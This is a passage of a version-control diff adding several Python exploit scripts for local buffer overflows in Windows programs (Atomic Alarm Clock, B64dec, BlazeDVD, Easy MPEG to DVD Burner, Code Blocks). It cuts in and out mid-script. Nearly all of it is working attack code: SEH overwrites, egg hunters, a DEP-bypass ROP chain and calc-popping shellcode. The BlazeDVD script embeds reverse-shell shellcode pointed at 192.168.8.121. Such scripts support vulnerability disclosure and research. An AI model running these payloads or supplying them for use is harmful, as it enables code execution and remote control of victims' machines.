venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 22nd byte - \x00 => \x3F
venBlinds += '\xC6\x3F' # mov byte [eax], 0x3F
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 24nd byte - \x00 => \x1F
venBlinds += '\xC6\x1F' # mov byte [eax], 0x1F
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 26th byte - \x00 => \x49
venBlinds += '\xC6\x49' # mov byte [eax], 0x49
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 28th byte - \x00 => \x02
venBlinds += '\xC6\x02' # mov byte [eax], 0x02
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 30th byte - \x00 => \xED
venBlinds += '\xC6\xED' # mov byte [eax], 0xED
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
## 32nd byte - \x00 => \xC3
venBlinds += '\xC6\xC3' # mov byte [eax], 0xC3
venBlinds += '\x72' # add [edx], dh
venBlinds += '\x40' # inc eax // now eax points shellcode byte
venBlinds += '\x72' # add [edx], dh
# Jump to the decoded decoder by Returning to the address we saved on the stack
venBlinds += '\xC3' # ret [!] Now we are executing the decoder!
os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))
#badChars = 00 0d 80 82->8e 91->9f
# Custom PopCalc shellcode that avoids the bad characters
fKernel32 = '\x33\xF6' # xor esi, esi
fKernel32 += '\xF7\xE6' # mul esi
fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30] # EBX = Address_of_PEB
fKernel32 += '\x03\x42\x0C' # add eax, [edx+C] # EBX = Address_of_LDR
fKernel32 += '\x03\x70\x1C' # add esi, [eax+1C] # ESI = 1st entry in InitOrderModuleList / ntdll.dll
fKernel32 += '\xAD' # lodsd # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll
fKernel32 += '\x50' # push eax
fKernel32 += '\x5E' # pop esi
fKernel32 += '\xAD' # lodsd # EAX = 3rd entry in InitOrderModuleList / kernel32.dll
fKernel32 += '\xFF\x70\x08' # push dword ptr [eax+8] # [ESP] = &kernel32
gExpotTbl = '\x33\xC9' # xor ecx, ecx
gExpotTbl += '\x33\xF6' # xor esi, esi
gExpotTbl += '\x33\xDB' # xor ebx, ebx
gExpotTbl += '\xF7\xE3' # mul ebx
gExpotTbl += '\x58' # pop eax # EAX = &kernel32
gExpotTbl += '\x50' # push eax # [ESP] = &kernel32
gExpotTbl += '\x03\x70\x3C' # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader
gExpotTbl += '\x03\xF0' # add esi, eax ; ESI = &NewEXEHeader
gExpotTbl += '\x03\x56\x78' # add edx, [esi+0x78] ; EDX = RVA ExportTable
gExpotTbl += '\x03\xD0' # add edx, eax ; EDX = &ExportTable = 763477B0
gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable
gExpotTbl += '\x03\xD8' # add ebx, eax ; EBX = &ExportNameTable
gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable
gExpotTbl += '\x03\xC8' # add ecx, eax ; ECX = &ExportOrdinalTable
gExpotTbl += '\x51' # push ecx
gExpotTbl += '\x33\xFF' # xor edi, edi
gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable
gExpotTbl += '\x03\xF8' # add edi, eax ; EDI = &ExportAddrTable
gExpotTbl += '\x57' # push edi
fWinExec = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW
fWinExec += '\x33\xC0' # xor eax, eax ; EAX = Counter
fWinExec += '\x33\xF6' # xor esi, esi
fWinExec += '\x03\xF4' # add esi, esp ; ESI = "WinE"
fWinExec += '\xFC' # cld ; Process strings left to right
fWinExec += '\x50' # push eax
fWinExec += '\x33\xC9' # xor ecx, ecx
fWinExec += '\x41' # inc ecx
fWinExec += '\x41' # inc ecx
fWinExec += '\x41' # inc ecx
fWinExec += '\x41' # inc ecx
fWinExec += '\xF7\xE1' # mul ecx
fWinExec += '\x33\xFF' # xor edi, edi
fWinExec += '\x03\x3C\x18' # add edi, [eax+ebx]
fWinExec += '\x58' # pop eax
fWinExec += '\x03\x7C\x24\x0C' # add edi, [esp+0xC] ; EDI = &NthNameString
fWinExec += '\xF3\xA6' # repe cmpsb ; compare [&NthNameString] to "WinExec"
fWinExec += '\x74\x03' # jz found ; If [&NthNameString] == "WinExec" end loop
fWinExec += '\x40' # inc eax ; Counter ++
fWinExec += '\xEB\xE1' # jmp short searchLoop ; restart loop
fWinExec += '\x33\xC9' # xor ecx, ecx
fWinExec += '\x41' # inc ecx
fWinExec += '\x41' # inc ecx
fWinExec += '\xF7\xE1' # mul ecx
fWinExec += '\x33\xC9' # xor ecx, ecx
fWinExec += '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable
fWinExec += '\x03\xC8' # add ecx, eax
fWinExec += '\x33\xC0' # xor eax, eax
fWinExec += '\x66\x03\x01' # add ax, [ecx] ; AX = ordinalNumber
fWinExec += '\x33\xC9' # xor ecx, ecx
fWinExec += '\x41\x41\x41\x41' # inc ecx X 4
fWinExec += '\xF7\xE1' # mul ecx
fWinExec += '\xFF\x74\x24\x04' # push dword [esp+0x4]
fWinExec += '\x01\x04\x24' # add [esp], eax
fWinExec += '\x5A' # pop edx
fWinExec += '\x33\xDB' # xor ebx, ebx
fWinExec += '\x03\x1A' # add ebx, [edx] ; EBX = RVA WinExec
fWinExec += '\x03\x5C\x24\x0C' # add ebx, [esp+0xC] ; EBX = &WinExec
# Call WinExec( CmdLine, ShowState );
# CmdLine = "calc.exe"
# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec = '\x33\xC9' # xor ecx, ecx ; clear eax register
callWinExec += '\x51' # push ecx ; string terminator 0x00 for "calc.exe" string
callWinExec += '\x68\x2E\x65\x78\x65' # push 0x6578652e ; exe. : 6578652e
callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163
callWinExec += '\x33\xC0' # xor eax, eax
callWinExec += '\x03\xC4' # add eax, esp ; save pointer to "calc.exe" string in eax
callWinExec += '\x41' # inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001
callWinExec += '\x51' # push ecx ; uCmdShow - push 0x1 to stack # 2nd argument
callWinExec += '\x50' # push eax ; lpcmdLine - push string address stack # 1st argument
callWinExec += '\xFF\xD3' # call ebx ; Call the WinExec Function
shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec
buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
filler = '\x77'*(9000-len(buffer))
buffer = buffer+filler
try:
payload = buffer
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'

55
exploits/windows/local/48317.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
# Date: 2020-04-13
# Exploit Author: Andy Bowden
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 10 x86
#Instructions:
# Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode.
f = open("crash.txt", "wb")
padding1 = b"ERCDERCD"
padding1 += b"\x90" * 100
# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
# cmd=calc.exe exitfunc=thread -f python
payload = b""
payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
egghunter = b"\x8B\xFD" # mov edi,ebp
egghunter += b"\xB8\x45\x52\x43\x44" # mov eax,45525344 ERCD
egghunter += b"\x47" # inc edi
egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xFB" # jne
egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xF7" # jne
egghunter += b"\xFF\xE7" # jmp edi
buf = padding1 + payload
buf += b"\x90" * (580 - len(padding1 + payload))
buf += egghunter
buf += b"\x90" * (620 - len(buf))
buf += b"\x90\x90\xEB\xCE"
buf += b"\x86\x1e\x40" #00401e86
f.write(buf)
f.close()

80
exploits/windows/local/48329.py Executable file
View file

@ -0,0 +1,80 @@
# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86
#!/usr/bin/python
file = "exploit.plf"
offset ="A"*(612-4)
nseh = "\xeb\x1e\x90\x90"
seh = "\x34\x31\x02\x64"
nops = "\x90" * 24
# msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"
buffer = offset + nseh + seh + nops + shellcode
f = open(file,'w')
f.write(buffer)
f.close()

150
exploits/windows/local/48339.py Executable file
View file

@ -0,0 +1,150 @@
# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)
# Date: 2020-04-15
# Exploit Author: Bailey Belisario
# Tested On: Windows 7 Ultimate x64
# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe
# Version: 1.7.11
# Exploit Length: 1015 Bytes
# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode)
# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow
# Exploit used with Python2.7
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characters: \x00\x0a\x0d #
# SEH Offset: 1012 #
# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# Register setup for VirtualProtect() (Bypass DEP) :
#---------------------------------------------------
# EAX = Points to PUSHAD at time VirtualProtect() is called
# ECX = lpflOldProtect (0x10047d30 as writable location)
# EDX = flNewProtect(0x40)
# EBX = dwSize (0x92)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)
import struct
def create_rop_chain():
rop_gadgets = [
# Put 1 in EDX and decrement to 0
0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
0x1003629a, # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN
0x11111111, # Filler
# Pop the pointer of VirtualProtect into EAX
0x10037b12, # POP EAX # RETN
0x1003b268, # ptr to &VirtualProtect() [IAT SkinMagic.dll]
# Dereference Pointer into EDX then move back to EAX
0x1001c011, # ADD EDX,DWORD PTR [EAX] # RETN 0x0C
0x10031772, # MOV EAX,EDX # RETN
0x11111111, # Filler
0x11111111, # Filler
0x11111111, # Filler
# Push VP and pop into EBP
0x1002e17b, # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C
0x10037b12, # POP EAX # RETN
0x11111111, # Filler
0x11111111, # Filler
0x11111111, # Filler
# Use this to get to address needed to Pop VP into ESI
0x1003619e, # POP EAX # POP ESI # RETN
# Move VP to +12 on stack then push the POP POP RETN
0x10032485, # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN
0x11111111, # Filler popped
0x11111111, # Filler popped
# Set ESI to VP
0x1002e1ce, # POP ESI # RETN [SkinMagic.dll]
0x11111111, # Where VP is MOV into
# Set EBP with POP EBP RETN
0x1002894f, # POP EBP # RETN [SkinMagic.dll]
0x1002894f, # skip 4 bytes [SkinMagic.dll]
# Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F)
# Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40
0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
0x10037b12, # POP EAX # RETN
0x1005a0a0, # Address of 3F
0x10026173, # ADD EDX,DWORD PTR [EAX] # RETN
# Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers
# Note: This should be at least length of shellcode
0x100362c6, # XOR EAX,EAX # RETN
0x10033fb2, # ADD AL,0C9 # RETN
0x10033fb2, # ADD AL,0C9 # RETN
0x10035c12, # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN
# Set ECX to writable location
0x1003603f, # POP ECX # RETN [SkinMagic.dll]
0x10047d30, # &Writable location [SkinMagic.dll]
# Set EDI to ROP NOP
0x100395c2, # POP EDI # RETN [SkinMagic.dll]
0x10032982, # RETN (ROP NOP) [SkinMagic.dll]
# Do PUSHAD and be 1337
0x10037654, # POP EAX # RETN
0xa140acd2, # CONSTANT
0x100317c8, # ADD EAX,5EFFC883 # RETN
0x1003248d, # PUSH EAX # RETN
# Used to jump to ESP
0x1001cc57, # ptr to 'push esp # ret ' [SkinMagic.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
ropChain = create_rop_chain()
# CALC.EXE for POC
shell = ("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
"\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F"
"\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
"\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45"
"\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")
# 148 Bytes needed to return to ROP CHAIN
paddingBeginning = "B"*148
# NOP Sled needs to be sufficient length, from some math, I came out with a buffer of 444 - len(ROP CHAIN)
nopLen = 444 - len(ropChain)
nopSled = '\x90'*nopLen
# Padding to SEH needs to consider the 420 bytes remaining - shellcode
paddingMiddleLen = 420 - len(shell)
paddingMiddle = 'B'*paddingMiddleLen
# 0x004043ee (add esp, 7D4) Stack Pivot 2004 bytes
# This brings total bytes to SEH Offset (1012) + 3 for a total of 1015 bytes
seh = "\xee\x43\x40"
# Exploit Visualization #
#------------------------#
# BBBBBBBBBBBBBBBBBBBB #
#------------------------#
# ROP CHAIN #
#------------------------#
# NOPS #
#------------------------#
# SHELL CODE #
#------------------------#
# BBBBBBBBBBBBBBBBBBBB #
#------------------------#
# SEH #
#------------------------#
exploit = paddingBeginning + ropChain + nopSled + shell + paddingMiddle + seh
file = open("pwn.txt", 'w')
file.write(exploit)
file.close()

31
exploits/windows/local/48344.py Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE
# Date: 2020-04-17
# Exploit Author: T3jv1l
# Software Link: https://sourceforge.net/projects/codeblocks/files/Binaries/16.01/Windows/codeblocks-16.01-setup.exe
# Software version: 16.01
buffer="A"*536 #buffer
buffer+="\x61\x41" #POPAD + Aligned
buffer+="\xF2\x41" #POP/POP/RET
#----------------------Align the eax to point to the shellcode PART -----------------------
#buffer+="\x90" #NOP
#buffer+="\x6e" #venetian padding
#buffer+="\x05\x37\x13" #add eax, 0x13003700
#buffer+="\x6e"
#buffer+="\x2d\x36\x13" #sub eax, 0x13003600
#buffer+="\x6e" #venetian padding
#buffer+="\x50" #push eax
#buffer+="\x6e" #Venetian padding
#buffer+="\xc3" #ret
#----------------------Shellcode PlaceHOLDER ----------------------------------------------
#uffer+="\x90"*111
#buffer+=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIX52KPKPM01PDIJEP1Y0QT4KPPNPTK1BLLTK1BMDDKSBNHLO6WPJNFNQKOVLOLC13LM2NLO07QXOLMKQ7WJBZR220WDKQBN0TKOZOLTKPLN1T8ZCOXKQZ10QTKQIMPKQXSTKOYLXISOJ19TKNTTKM1XV01KOFL7Q8OLMKQGW08YPD5L6KSSMJXOKSMMTBU9TPXDKR8MTKQYCRF4KLLPKTKPXMLKQJ3TKKTDKKQZ0E9OTMTO4QK1K1Q291JPQKO9PQOQOQJTKN2JKDM1MRJKQ4M3UGBKPM0M0R0RHNQTKRO4GKOXUWKL0VU6BPVQXVFDU7MUMKO9EOLM63LLJE0KKYP2UM5WKOWN3T2RORJKP1CKOJ5BCS1RL33NNS5RX2EKPA")
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x90"*(5000-len(buffer))
f=open('exploit.m3u','w');
f.write(buffer);
f.close();
print "[+] File created."

97
exploits/windows/local/48346.py Executable file
View file

@ -0,0 +1,97 @@
# Exploit Title: Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)
# Exploit Author: Bobby Cooke
# Date: 2020-04-17
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/ataclock.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: Atomic Alarm Clock 6.3 beta
# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer
File = 'poc.txt'
os_nSEH = '\x41'*(461)
nSEH = '\xeb\x05' # jmp short +2
SEH = '\x47\x47' # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe]
#{PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False
getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory
getPC += '\x61' # popad # [ESP] = &Payload
getPC += '\x72' # add [edx], dh # realigns execution for 1 byte opcodes
ebx2eax = '\x58' # pop eax # EAX = &Payload
ebx2eax += '\x72' # add [edx], dh
# Ajust EAX to &Decoder
getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += '\x72' # add [edx], dh
getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += '\x72' # add [edx], dh
getDecoder += '\x50' # push eax # [ESP] = &Decoder
getDecoder += '\x72' # add [edx], dh
#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50'
## 2nd byte - \x00 => \x5F
venBlinds = '\x40\x72\xC6\x5F\x72\x40\x72\x40\x72'
## 4th byte - \x00 => \x33
venBlinds += '\xC6\x33\x72\x40\x72\x40\x72'
## 6th byte - \x00 => \x33
venBlinds += '\xC6\x33\x72\x40\x72\x40\x72'
## 8th byte - \x00 => \x66
venBlinds += '\xC6\x66\x72\x40\x72\x40\x72'
## 10th byte - \x00 => \x10
venBlinds += '\xC6\x10\x72\x40\x72\x40\x72'
## 12th byte - \x00 => \x33
venBlinds += '\xC6\x33\x72\x40\x72\x40\x72'
## 14th byte - \x00 => \x42
venBlinds += '\xC6\x42\x72\x40\x72\x40\x72'
## 16th byte - \x00 => \x32
venBlinds += '\xC6\x32\x72\x40\x72\x40\x72'
## 18th byte - \x00 => \x02
venBlinds += '\xC6\x02\x72\x40\x72\x40\x72'
## 20th byte - \x00 => \x10
venBlinds += '\xC6\x10\x72\x40\x72\x40\x72'
## 22nd byte - \x00 => \x3F
venBlinds += '\xC6\x3F\x72\x40\x72\x40\x72'
## 24nd byte - \x00 => \x1F
venBlinds += '\xC6\x1F\x72\x40\x72\x40\x72'
## 26th byte - \x00 => \x49
venBlinds += '\xC6\x49\x72\x40\x72\x40\x72'
## 28th byte - \x00 => \x02
venBlinds += '\xC6\x02\x72\x40\x72\x40\x72'
## 30th byte - \x00 => \xED
venBlinds += '\xC6\xED\x72\x40\x72\x40\x72'
## 32nd byte - \x00 => \xC3
venBlinds += '\xC6\xC3\x72\x40\x72'
# Jump to the decoded decoder by Returning to the address we saved on the stack
venBlinds += '\xC3' # ret [!] Now we are executing the decoder!
os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))
# Custom PopCalc shellcode that avoids the bad characters
fKernel32 = '\x33\xF6\xF7\xE6\x64\x03\x52\x30\x03\x42\x0C\x03\x70\x1C\xAD\x50\x5E\xAD\xFF\x70\x08'
gExpotTbl = '\x33\xC9\x33\xF6\x33\xDB\xF7\xE3\x58\x50\x03\x70\x3C\x03\xF0\x03\x56\x78\x03\xD0\x03\x5A\x20\x03\xD8\x03\x4A\x24\x03\xC8\x51\x33\xFF\x03\x7A\x1C\x03\xF8\x57'
